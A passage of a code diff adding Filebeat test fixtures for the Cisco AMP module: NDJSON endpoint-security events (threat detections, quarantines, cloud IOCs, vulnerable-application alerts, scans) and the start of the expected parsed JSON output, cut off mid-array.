IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610447087,"start_date":"2021-01-12T10:24:47+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6532910514396201000,"timestamp":1610446522,"timestamp_nanoseconds":872000000,"date":"2021-01-12T10:15:22+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:Malwaregen.21do.1201","detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"OLD.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\OLD.exe","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9","sha1":"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c","md5":"cfdd16225e67471f5ef54cab9b3a5558"},"parent":{"process_id":2632,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef","sha1":"84123a3decdaa217e3588a1de59fe6cee1998004","md5":"38ae1b3c38faef56fe4907922f0385ba"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Auto.F2863A.211556.in02","detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"twhy.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Roaming\\twhy.exe","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117","sha1":"7d9518ea3f98d037745352b23861fab05d3777dc","md5":"c624d61b8f076c3ef05f74eeb96c8954"},"parent":{"process_id":4868,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132516139000,"timestamp":1608874241,"timestamp_nanoseconds":516130000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132474871000,"timestamp":1608874241,"timestamp_nanoseconds":474861000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384389977,"timestamp":1608872547,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:27+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872547,"start_date":"2020-12-25T05:02:27+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384371995,"timestamp":1608872546,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:26+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872546,"start_date":"2020-12-25T05:02:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193366641599,"timestamp":1608870773,"timestamp_nanoseconds":0,"date":"2020-12-25T04:32:53+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608870773,"start_date":"2020-12-25T04:32:53+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"OUTLOOK.EXE","identity":{"sha256":"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc"},"parent":{"disposition":"Clean","identity":{"sha256":"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2016","cve":"CVE-2017-0106","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106"},{"cve":"CVE-2017-11774","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774"},{"cve":"CVE-2017-8506","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506"},{"cve":"CVE-2017-8507","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507"},{"cve":"CVE-2017-8571","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571"},{"cve":"CVE-2017-8663","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663"},{"cve":"CVE-2018-0791","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525498672153625000,"timestamp":1608870165,"timestamp_nanoseconds":878000000,"date":"2020-12-25T04:22:45+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494703603843000,"timestamp":1608869241,"timestamp_nanoseconds":928000000,"date":"2020-12-25T04:07:21+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2872,"scanned_processes":49,"scanned_paths":0,"malicious_detections":0}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494527510184000,"timestamp":1608869200,"timestamp_nanoseconds":537000000,"date":"2020-12-25T04:06:40+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json new file mode 100644 index 00000000000..6f6bb95e97a --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp1.ndjson.log-expected.json @@ -0,0 +1,2759 @@ +[ + { + "@timestamp": "2021-01-14T10:33:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.12081E6CA3-95.SBX.TG", + "cisco.amp.detection_id": "6411425813945647105", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 742000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411425813945647000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "c877b67a5733c59d0d8ed8d519df0c91", + "file.hash.sha1": "128aa78059540cf0cdae2a3cea30cd80e00f2046", + "file.hash.sha256": "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837", + "file.name": "MspthrdHash.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 0, + "related.hash": [ + "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837", + "c877b67a5733c59d0d8ed8d519df0c91", + "128aa78059540cf0cdae2a3cea30cd80e00f2046" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:15:29.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 596000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6533243623469744000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 1358, + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:06:39.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Overdrive.RET", + "cisco.amp.detection_id": "6533241347137077251", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 657000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533241347137077000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "0fe5be3811a98ee6a9c997d3812d911a", + "file.hash.sha1": "cf162622e29bca072d01b274fbbc3ceaacdd13c7", + "file.hash.sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "file.name": "BIT657.tmp", + "file.path": "\\\\?\\C:\\BIT657.tmp", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 2295, + "process.hash.md5": "54a47f6b5e09a77e61649109c6a08866", + "process.hash.sha1": "4af001b3c3816b860660cf2de2c0fd3c1dfb4878", + "process.hash.sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2", + "process.name": "svchost.exe", + "process.pid": 896, + "related.hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "0fe5be3811a98ee6a9c997d3812d911a", + "cf162622e29bca072d01b274fbbc3ceaacdd13c7" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:06:39.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6533241347137077251", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 657000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533241347137077000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 3885, + "related.hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:05:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6533241145273614337", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 525000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533241145273614000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 5008, + "related.hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:05:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Overdrive.RET", + "cisco.amp.detection_id": "6533241145273614338", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 619000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533241145273614000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "0fe5be3811a98ee6a9c997d3812d911a", + "file.hash.sha1": "cf162622e29bca072d01b274fbbc3ceaacdd13c7", + "file.hash.sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "file.name": "SqGGuYXyy.exe", + "file.path": "\\\\?\\C:\\SqGGuYXyy.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 6204, + "process.hash.md5": "54a47f6b5e09a77e61649109c6a08866", + "process.hash.sha1": "4af001b3c3816b860660cf2de2c0fd3c1dfb4878", + "process.hash.sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2", + "process.name": "svchost.exe", + "process.pid": 896, + "related.hash": [ + 